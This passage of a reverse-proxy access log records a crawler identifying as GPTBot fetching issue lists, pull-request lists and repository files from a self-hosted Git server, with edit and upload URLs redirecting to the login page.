compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:18:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:18:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:18:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:18:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" -[17/Feb/2026:18:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log?display=source" [Client 74.7.227.38] [Length 410189] [Gzip 15.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:18:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log?display=source" [Client 74.7.227.38] [Length 14695] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:18:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log?display=source" [Client 74.7.227.38] [Length 30737] [Gzip 11.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:18:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log?display=source" [Client 74.7.227.38] [Length 28745] [Gzip 9.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:18:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log?display=source" [Client 74.7.227.38] [Length 97613] [Gzip 18.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:18:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log?display=source" [Client 74.7.227.38] [Length 15028] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:18:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log?display=source" [Client 74.7.227.38] [Length 25352] [Gzip 11.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:18:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log?display=source" [Client 74.7.227.38] [Length 48519] [Gzip 12.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:18:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11365] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:18:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" [Client 74.7.227.38] [Length 11307] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:18:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12920] [Gzip 4.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:18:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&state=closed&type=all" -[17/Feb/2026:18:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:18:29:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:29:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:29:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:18:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:18:29:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:18:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:18:29:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 